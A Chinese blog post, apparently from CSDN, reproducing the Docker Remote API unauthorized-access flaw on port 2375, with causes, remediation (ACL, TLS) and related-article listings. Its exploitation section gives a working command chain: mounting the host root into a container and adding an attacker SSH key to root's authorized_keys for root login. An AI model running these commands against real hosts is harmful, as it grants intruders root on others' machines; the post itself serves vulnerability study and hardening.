Docker_remote_api未授权访问漏洞

最新推荐文章于 2024-08-04 18:34:53 发布
最新推荐文章于 2024-08-04 18:34:53 发布
阅读量2.1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: docker ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46564680/article/details/120745889
版权
本文介绍了Docker Remote API的默认安全设置及其存在的未授权访问漏洞,详细阐述了漏洞如何导致外部可以执行docker命令,获取敏感信息甚至宿主机root权限。示例展示了如何利用该漏洞远程启动容器并进行恶意操作。为修复此问题,建议设置ACL限制访问IP,启用TLS并使用证书认证。参考链接提供了具体修复步骤。
摘要由CSDN通过智能技术生成

Docker_remote_api未授权访问漏洞

docker_remote_api简介:

docker remote api主要的目的是取代命令行界面,
docker client和docker daemon通过unix domain socket进行通信.
默认情况下,只有本机的root和docker组用户才能操作docker.

漏洞成因:

  1. dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375
  2. docker守护进程监听在0.0.0.0,外网可访问
  3. 没有使用iptable等限制可连接的来源ip。

漏洞危害:

可执行docker命令,获取敏感信息,获取docker镜像权限,获取镜像宿主机root权限。

漏洞利用:

  1. 远程对被攻击主机的docker容器进行操作
    docker -H tcp://x.x.x.x:2375 images
    在这里插入图片描述

  2. 远程启动被攻击主机的docker容器,并且将该宿主机的根目录挂载到容器的/mnt目录下
    docker -H tcp://x.x.x.x:2375 run -it-v /:/mnt imageID /bin/bash
    在这里插入图片描述

  3. 在攻击机生成密钥对,复制dockerapi.pub的内容
    Ssh-keygen -f dockerapi
    在这里插入图片描述

  4. 进入/root/mnt/root/.ssh目录下,将dockerapi.pub的内容追加到authorized_keys中
    Cd /root/mnt/root/.ssh
    Echo 公钥内容 >> authorized_keys

  5. 在攻击机使用私钥登录宿主机
    Ssh -i dockerapi root@宿主机IP
    在这里插入图片描述

修复方法:

1、设置ACL,只允许信任ip连接对应端口
2、开启TLS,使用生成的证书进行认证
修复参考链接:https://docs.docker.com/engine/security/https/

其他参考链接:
https://www.cnblogs.com/pythonal/p/9207696.html

marmot0h
关注
专栏目录
docker remote api授权访问漏洞(端口:2375)
墨痕诉清风的博客
11-11 4415
授权访问漏洞是因为可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个apiurl输入ip:2375/version就会列出基本信息,和docker version命令效果一样。同样,url为ip:2375/v1.23/containers/json会列出容器信息,和docker ps -a效果一样。...
漏洞挖掘】——94、Docker授权访问
Fly_鹏程万里
06-17 121
Docker是一种开源的容器化平台,用于构建、打包和运行应用程序及其依赖项,它通过使用容器来实现应用程序的轻量级隔离,使得应用程序可以在不同的环境中以一致的方式运行,Docker广泛应用于软件开发、持续集成/持续交付(CI/CD)、微服务架构、大规模部署和云计算等领域,它简化了应用程序的构建、交付。Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行。
DOCKER REMeOTE API 授权访问漏洞复现
weixin_43061533的博客
12-01 745
0x01 漏洞简述 Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。 0x02 风险等级 严漏洞的评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 Dockerdocker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问 Docker没有使用iptables
关于docker remote api授权访问漏洞的学习与研究
07-16 633
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Remote API 授权访问漏洞
最新发布
weixin_53736204的博客
08-04 304
Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2369
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker Remote API授权访问
lyink001的博客
12-16 1354
docker remote api获取服务器权限
Docker授权访问漏洞
qq_48257021的博客
03-26 859
1)Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。可以将Docker理解为一个集装箱,集装箱解决了什么问题?在一艘大船上,可以把货物规整的摆放起来,并且各种各样的货物被集装箱标准化了,集装箱和集装箱之间不会互相影响。
Docker Remote API 越权漏洞
人猿进化论
12-06 624
Docker Remote API 漏洞
Docker Remote API 授权访问导致挖矿病毒入侵
SecGuard
06-09 2635
运维同事反映一台阿里云测试机,反映很慢,除了跑一些docker容器,没有其他服务。 ps -ef查看当前进程,发现存在多个cryptonight加密货币的挖矿进程,分别为proc, thisxxs, xmrig: 对这些进程的所在路径进行排查,使用lsof工具查看它们打开的文件:进程所使用的文件都已经找不到,初步判断是被删除。 换个思路(中间尝试过各种假设)扫描该服务器,发现开放...
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ipdocker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
漏洞——Docker远程api授权访问(原理扫描)
龍承leo
10-24 864
Docker远程api授权访问(原理扫描)
Docker Remote API授权访问漏洞分析和利用
热门推荐
3569
12-01 1万+
0x00 概述 最近提交了一些关于 docker remote api 授权访问导致代码泄露、获取服务器root权限的漏洞,造成的影响都比较严重,比如 新姿势之获取果壳全站代码和多台机器root权限 新姿势之控制蜻蜓fm所有服务器 新姿势之获取百度机器root权限 因为之前关注这一块的人并不多,这个方法可以算是一个“新的姿势”,本文对漏洞产生的原因和利用过程进行
docker remote api授权访问_【超详细】Redis 授权访问漏洞
weixin_39747568的博客
11-26 323
0x01 漏洞描述  Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用...
所谓的"新姿势之Docker Remote API授权访问漏洞分析和利用"
weixin_33725515的博客
05-19 253
最近乌云上出现了一篇文章 http://drops.wooyun.org/papers/15892。这种作者就一个好,写文章比谁都快,可惜从来不愿意踏踏实实的分析,非得搞个大新闻,把Docker/Swarm批判一番。 先说结论,Docker采用C/S结构,但是它的client和server用的是同一个binary文件: docker,根据参数不同执行不同...
[Shell]Docker remote api授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 702
0x01 简介 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api授权访问的攻击原理与之前的Redis授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值